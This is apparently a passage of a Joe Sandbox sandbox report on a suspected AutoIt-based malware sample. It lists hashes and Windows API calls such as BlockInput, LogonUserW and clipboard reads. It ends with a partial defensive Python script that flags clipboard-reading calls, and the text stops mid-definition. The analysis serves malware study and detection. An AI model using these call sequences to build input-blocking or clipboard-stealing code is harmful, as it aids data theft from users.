                                                                                          • Opcode ID: b8def19716de174921965326585c8a0a0c2eba4d3f226f62ebfac136bfb84777
                                                                                          • Instruction ID: fac722ae1e10b3ad9494cda40f9fb3e9e62b3c26aea04ddfc6562ea9d2065ebb
                                                                                          • Opcode Fuzzy Hash: b8def19716de174921965326585c8a0a0c2eba4d3f226f62ebfac136bfb84777
                                                                                          • Instruction Fuzzy Hash: C512B4B7B983194FDB48DEE4DCC169573E1FB98304F09A43C9A15C7306F6E8AA094794
                                                                                          APIs
                                                                                          • DefDlgProcW.USER32(?,?,?,?,004A83D8,?), ref: 0047E22C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                           • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Proc
                                                                                          • String ID:
                                                                                          • API String ID: 2346855178-0
                                                                                          • Opcode ID: 4f476b527310cd4595d6f2246be334f82b87c4d4a511bc9a4ae10ad49a3a576c
                                                                                          • Instruction ID: e1c03c818efbd3cbf3664a0c3e659178dbc9a05004c0f073233894ce1d713c90
                                                                                          • Opcode Fuzzy Hash: 4f476b527310cd4595d6f2246be334f82b87c4d4a511bc9a4ae10ad49a3a576c
                                                                                          • Instruction Fuzzy Hash: 4EB1E63330602429E114916BBC88EBFBB9CD7D677BB208B7FF142C1582DB5B6425A179
                                                                                          APIs
                                                                                          • BlockInput.USER32(00000001), ref: 0045A272
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                           • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: BlockInput
                                                                                          • String ID:
                                                                                          • API String ID: 3456056419-0
                                                                                          • Opcode ID: f8b7596c9daf0cf449ec099d4cdbafb4be693b9bdeaa48314d03f681346fce8b
                                                                                          • Instruction ID: 5d782454ef4d0180448527013755d2523f66e5fc327f68786c1d80a86620ac83
                                                                                          • Opcode Fuzzy Hash: f8b7596c9daf0cf449ec099d4cdbafb4be693b9bdeaa48314d03f681346fce8b
                                                                                          • Instruction Fuzzy Hash: D2E04F752043019BC700EF71C545A5BB7E4AF94314F108C6EF845A7351D775AC45CB66
                                                                                          APIs
                                                                                          • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 0043918E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                           • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: LogonUser
                                                                                          • String ID:
                                                                                          • API String ID: 1244722697-0
                                                                                          • Opcode ID: 365ca9639b26e9c6c56151d88f527b1e4ffaee0f54dfd66c8778d151900be7f4
                                                                                          • Instruction ID: 63114e5cfb2c4979e73f5d19eacf740c811f86df1a08bc2cb556a5e36cce81ff
                                                                                          • Opcode Fuzzy Hash: 365ca9639b26e9c6c56151d88f527b1e4ffaee0f54dfd66c8778d151900be7f4
                                                                                          • Instruction Fuzzy Hash: 8DD0ECB52686066FD204CB24D846E2B77E9A7C4701F008A0CB196D2280C670D805CA32
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                           • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: NameUser
                                                                                          • String ID:
                                                                                          • API String ID: 2645101109-0
                                                                                          • Opcode ID: b783c70369e54a54257db95ea8fbffa2a0b511f3d9d58af1a6b6f1143851980f
                                                                                          • Instruction ID: 8011c19b6c32d183c263453b2018abc548473ce9ed5616c99acac4896e71f792
                                                                                          • Opcode Fuzzy Hash: b783c70369e54a54257db95ea8fbffa2a0b511f3d9d58af1a6b6f1143851980f
                                                                                          • Instruction Fuzzy Hash: F6E08C322083058FC310EF55F8405ABB390EB94311F004C3FE64AA2191DA79920EDFAB
APIs
• SetUnhandledExceptionFilter.KERNEL32(Function_00021FEC), ref: 00422033
Memory Dump Source
• Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
Similarity
• API ID: ExceptionFilterUnhandled
• API String ID: 3192549508-0
• Opcode ID: 299f58dbcf75cd09f1fee721c9404e411c3f17cf80a1a40ae63587de51767455
• Instruction ID: 3275b40964251646410af8875a24301f93fa315c26af6adae0ca3d0f7a721f84
• Instruction Fuzzy Hash: CD9002743511144A4A011BB16E5D90925D46A586067920875B411C4064DB9840019619
Memory Dump Source
• Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
Similarity
• Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
• Instruction ID: b3f199f19983f506b623bfe7955a95149e6efe4e98ce3416cc40fa12ddcf4508
• Instruction Fuzzy Hash: 46D19073C0A9B30A8735812D42582BFEE626FD578131EC3E29CD07F38AD26B5DA195D4
Memory Dump Source
• Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
Similarity
• Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
• Instruction ID: c47bdb3f9c9e38c5d46ddb9e43dedaf70276048770aeb58bd274f21c588a824b
• Instruction Fuzzy Hash: 1CD19073D1A9B30A8735852D42581AFEE626FD578031EC3E2CCD07F38AD16B5DA191D4
Memory Dump Source
• Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
Similarity
• Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
• Instruction ID: ac15b8da1a4b082d71a0b082c8349c97121379a14580263daf363e6ab8f75410
• Instruction Fuzzy Hash: 87C18173C0A9B30A8736812D42641AFEE626FD579031FC3E2CCD47F38A91AB5DA195D4
Memory Dump Source
• Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
Similarity
• Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
• Instruction ID: aa957cafbedeae1199dea6a597ba911d219650f283d164fb65797e90308ef47b
• Instruction Fuzzy Hash: 5FC18E73D0A9B30A8735812D42581AFEE626FD578031EC3E28CE46F38ED26F5DA195D4
Memory Dump Source
• Source File: 00000000.00000002.1425973237.00000000040E3000.00000040.00000020.00020000.00000000.sdmp, Offset: 040E3000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_40e3000_XhAQ0Rk63O.jbxd
Similarity
• Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
• Instruction ID: ae6852f3b786a26cc90bcbc21f4f1cbb670b9d74aad5e9156a2f3b255a416631
• Instruction Fuzzy Hash: BB41A271D1051CEBCF48CFADC991AAEBBF2AF88201F548299D516AB345D730AB41DB90
Memory Dump Source
• Source File: 00000000.00000002.1425973237.00000000040E3000.00000040.00000020.00020000.00000000.sdmp, Offset: 040E3000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_40e3000_XhAQ0Rk63O.jbxd
Similarity
• Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
• Instruction ID: 3cb9b3b303fa4c5830534f142083fcb9d504ffea91f07eadfc458dad488121f3
• Instruction Fuzzy Hash: CE019278A00109EFCB84DF99D5909AEF7F5FF48310F608599E819A7341E731AE51DB80
Memory Dump Source
• Source File: 00000000.00000002.1425973237.00000000040E3000.00000040.00000020.00020000.00000000.sdmp, Offset: 040E3000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_40e3000_XhAQ0Rk63O.jbxd
Similarity
• Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
• Instruction ID: 2ac4f54d0c6f86d25d7f70de9ceae714c2440e814a96b2452028877cbb49121a
• Instruction Fuzzy Hash: 2501D278A00109EFCB88DF99D5809AEF7F5FF48310F608999E809A7340E731AE51DB80
Memory Dump Source
• Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
Similarity
• Opcode ID: 304d221b5688423ebfa6c473264aec07cdb78ae451f757bdd5acbbf2c1e92ad4
• Instruction ID: b8cfd58d412160527e66ace840abba843d94ac3f5b06779728c9fe736b8606cc
• Instruction Fuzzy Hash: ECD012F621844146F33144D866C0BD100437344310FB58C276005CEBC1C0DDECD6C229
Memory Dump Source
• Source File: 00000000.00000002.1425973237.00000000040E3000.00000040.00000020.00020000.00000000.sdmp, Offset: 040E3000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_40e3000_XhAQ0Rk63O.jbxd
Similarity
• Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
• Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
• Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
APIs
• DeleteObject.GDI32(?), ref: 004593D7
• DeleteObject.GDI32(?), ref: 004593F1
• DestroyWindow.USER32(?), ref: 00459407
• GetDesktopWindow.USER32 ref: 0045942A
• GetWindowRect.USER32(00000000), ref: 00459431
• SetRect.USER32(50000001,00000000,00000000,000001F4,?), ref: 00459568
• AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00459577
• CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,?,?,50000001,?,?,00000000,00000000), ref: 004595BB
• GetClientRect.USER32(00000000,?), ref: 004595C8
• CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 00459615
• CreateFileW.KERNEL32(00000000,?,80000000,00000000,00000000,00000003,00000000,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459635
• GetFileSize.KERNEL32(00000000,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459654
• GlobalAlloc.KERNEL32(00000002,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 0045965F
• GlobalLock.KERNEL32(00000000), ref: 00459668
• ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459678
• GlobalUnlock.KERNEL32(00000000), ref: 0045967F
• CloseHandle.KERNEL32(00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459686
• CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,50000001,?,?,00000000,00000000,00000000), ref: 00459694
• OleLoadPicture.OLEAUT32(?,00000000,00000000,00482A20,000001F4), ref: 004596AD
• GlobalFree.KERNEL32(00000000), ref: 004596C0
• CopyImage.USER32(000000FF,00000000,00000000,00000000,00002000), ref: 004596EF
• SendMessageW.USER32(00000000,00000172,00000000,000000FF), ref: 00459712
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,50000001,?,?,00000000,00000000,00000000), ref: 0045973D
• ShowWindow.USER32(?,00000004,?,50000001,?,?,00000000,00000000,00000000), ref: 0045974B
• CreateWindowExW.USER32(00000000,static,00000000,?,?,0000000B,0000000B,?,?,?,00000000,00000000), ref: 0045979C
• CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004597AD
• GetStockObject.GDI32(00000011), ref: 004597B7
• SelectObject.GDI32(00000000,00000000), ref: 004597BF
• GetTextFaceW.GDI32(00000000,00000040,00000190,?,50000001,?,?,00000000,00000000,00000000), ref: 004597CD
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 004597D6
• DeleteDC.GDI32(00000000), ref: 004597E1
• _wcslen.LIBCMT ref: 00459800
• _wcscpy.LIBCMT ref: 0045981F
• CreateFontW.GDI32(?,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,00000190), ref: 004598BB
• SendMessageW.USER32(?,00000030,00000000,00000001), ref: 004598D0
• GetDC.USER32(?), ref: 004598DE
• SelectObject.GDI32(00000000,?), ref: 004598EE
• SelectObject.GDI32(00000000,?), ref: 00459919
• ReleaseDC.USER32(?,00000000), ref: 00459925
• MoveWindow.USER32(?,0000000B,?,?,?,00000001), ref: 00459943
• ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,00000190), ref: 00459951
Memory Dump Source
• Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
Similarity
• API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
• String ID: $AutoIt v3$DISPLAY$static
• API String ID: 4040870279-2373415609
• Opcode ID: d6fd8d7be04635d93ea84c38fc4cb072183cdb5133bdcfdddae5d23db1010fc6
• Instruction ID: fce7466cc8f2b4b34a2e278d60cb4f704f90ff1017bfb666dbfc83d8aba9d67a
• Instruction Fuzzy Hash: 3F028C70204301EFD714DF64DE89F2BB7A8AB84705F104A2DFA45AB2D2D7B4E805CB69
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                           • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: __wcsnicmp
                                                                                          • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                                                                                          • API String ID: 1038674560-3360698832
                                                                                          • Opcode ID: c74d0d52908dbbec4f5022c33a9c4844136c2b84c95de0bb8b15b994b6f8f789
                                                                                          • Instruction ID: b6083b7aed1673b33e689ff2aa7e8f17f47d7310e90ec65f4167159f85ee96f3
                                                                                          • Opcode Fuzzy Hash: c74d0d52908dbbec4f5022c33a9c4844136c2b84c95de0bb8b15b994b6f8f789
                                                                                          • Instruction Fuzzy Hash: 5A611471B4071076EA306A229C46FAB735CDF14345F50052FFC01A628BE7ADDA4A86EE
                                                                                          APIs
                                                                                          • GetSysColor.USER32(0000000E), ref: 00433D81
                                                                                          • SetTextColor.GDI32(?,00000000), ref: 00433D89
                                                                                          • GetSysColor.USER32(00000012), ref: 00433DA3
                                                                                          • SetTextColor.GDI32(?,?), ref: 00433DAB
                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 00433DBF
                                                                                          • GetSysColor.USER32(0000000F), ref: 00433DCB
                                                                                          • CreateSolidBrush.GDI32(?), ref: 00433DD4
                                                                                          • GetSysColor.USER32(00000011), ref: 00433DEB
                                                                                          • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00433DFD
                                                                                          • SelectObject.GDI32(?,00000000), ref: 00433E0D
                                                                                          • SetBkColor.GDI32(?,?), ref: 00433E19
                                                                                          • SelectObject.GDI32(?,?), ref: 00433E29
                                                                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 00433E54
                                                                                          • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00433E73
                                                                                          • GetWindowLongW.USER32 ref: 00433E8A
                                                                                          • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00433EAC
                                                                                          • GetWindowTextW.USER32(00000000,00000000,00000105), ref: 00433EE1
                                                                                          • InflateRect.USER32(?,000000FD,000000FD), ref: 00433F13
                                                                                          • DrawFocusRect.USER32(?,?), ref: 00433F1F
                                                                                          • GetSysColor.USER32(00000011), ref: 00433F2E
                                                                                          • SetTextColor.GDI32(?,00000000), ref: 00433F36
                                                                                          • DrawTextW.USER32(?,?,000000FF,?,?), ref: 00433F4E
                                                                                          • SelectObject.GDI32(?,?), ref: 00433F63
                                                                                          • DeleteObject.GDI32(?), ref: 00433F70
                                                                                          • SelectObject.GDI32(?,?), ref: 00433F78
                                                                                          • DeleteObject.GDI32(00000000), ref: 00433F7B
                                                                                          • SetTextColor.GDI32(?,?), ref: 00433F83
                                                                                          • SetBkColor.GDI32(?,?), ref: 00433F8F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                           • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                          • String ID:
                                                                                          • API String ID: 1582027408-0
                                                                                          • Opcode ID: aa49e6287f5c8eaa4963889518cb643ef6cff4134c3562cc94785d6825a4d511
                                                                                          • Instruction ID: aa454ab644ffbff4d2185aee23397a25bdbdaef3ad5a75b83a3ebbbeed3afe32
                                                                                          • Opcode Fuzzy Hash: aa49e6287f5c8eaa4963889518cb643ef6cff4134c3562cc94785d6825a4d511
                                                                                          • Instruction Fuzzy Hash: 53710570508340AFD304DF68DD88A6FBBF9FF89711F104A2DFA5592290D7B4E9418B6A
                                                                                          APIs
                                                                                          • OpenClipboard.USER32(?), ref: 0046C635
                                                                                          • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046C643
                                                                                          • GetClipboardData.USER32(0000000D), ref: 0046C64F
                                                                                          • CloseClipboard.USER32 ref: 0046C65D
                                                                                          • GlobalLock.KERNEL32(00000000), ref: 0046C688
                                                                                          • CloseClipboard.USER32 ref: 0046C692
                                                                                          • IsClipboardFormatAvailable.USER32(00000001), ref: 0046C6D5
                                                                                          • GetClipboardData.USER32(00000001), ref: 0046C6DD
                                                                                          • GlobalLock.KERNEL32(00000000), ref: 0046C6EE
                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 0046C726
                                                                                          • CloseClipboard.USER32 ref: 0046C866
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                           • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Clipboard$CloseGlobal$AvailableDataFormatLock$OpenUnlock
                                                                                          • String ID: HH
                                                                                          • API String ID: 589737431-2761332787
                                                                                          • Opcode ID: 1f8588b948bb152d659cc961560e711d284fc80ef968a1445fa6f6d22cce4332
                                                                                          • Instruction ID: ccec0c76267f611a980a6192e38ed766f4c6ddce8b7f15b38bc446a2cb1d96e7
                                                                                          • Opcode Fuzzy Hash: 1f8588b948bb152d659cc961560e711d284fc80ef968a1445fa6f6d22cce4332
                                                                                          • Instruction Fuzzy Hash: 4D61E5722003019BD310EF65DD86B5E77A8EF54715F00483EFA41E72D1EBB5D9048BAA
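The function above is the one behind the report's "Contains functionality for read data from the clipboard" signature: it opens the clipboard, asks for format 0000000D (CF_UNICODETEXT) and, failing that, 00000001 (CF_TEXT), then locks the returned HGLOBAL to read the text. The following script is an added example, not part of the Joe Sandbox report or its tooling: it parses the "APIs" listing format used on this page (bullet, Func.MODULE(args), ref: call-site address, with the optional "Part of subcall function" prefix) and flags clipboard reads together with the format requested. The sample input is a constructed copy of the listing above; the regex and the detection rule are the author's own, and the listing is treated as a static, address-ordered call inventory rather than an execution trace.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample: the clipboard function's API list copied in the report's
# own format, plus one "Part of subcall function" line to exercise that variant.
SAMPLE = """\
• OpenClipboard.USER32(?), ref: 0046C635
• IsClipboardFormatAvailable.USER32(0000000D), ref: 0046C643
• GetClipboardData.USER32(0000000D), ref: 0046C64F
• CloseClipboard.USER32 ref: 0046C65D
• GlobalLock.KERNEL32(00000000), ref: 0046C688
• CloseClipboard.USER32 ref: 0046C692
• IsClipboardFormatAvailable.USER32(00000001), ref: 0046C6D5
• GetClipboardData.USER32(00000001), ref: 0046C6DD
• GlobalLock.KERNEL32(00000000), ref: 0046C6EE
• GlobalUnlock.KERNEL32(00000000), ref: 0046C726
• CloseClipboard.USER32 ref: 0046C866
  • Part of subcall function 004115D0: __wcsicmp_l.LIBCMT ref: 00411657
"""

# One listing line: optional subcall prefix, Func.MODULE, optional (args),
# optional comma, then "ref: <8 hex digits>". Lines without parentheses
# (e.g. "CloseClipboard.USER32 ref: ...") are valid and must parse too.
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<func>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# Standard Windows clipboard format constants (winuser.h).
CLIPBOARD_FORMATS = {0x1: "CF_TEXT", 0xD: "CF_UNICODETEXT", 0xF: "CF_HDROP"}


@dataclass
class ApiCall:
    func: str
    module: str
    ref: int                       # call-site address from "ref:"
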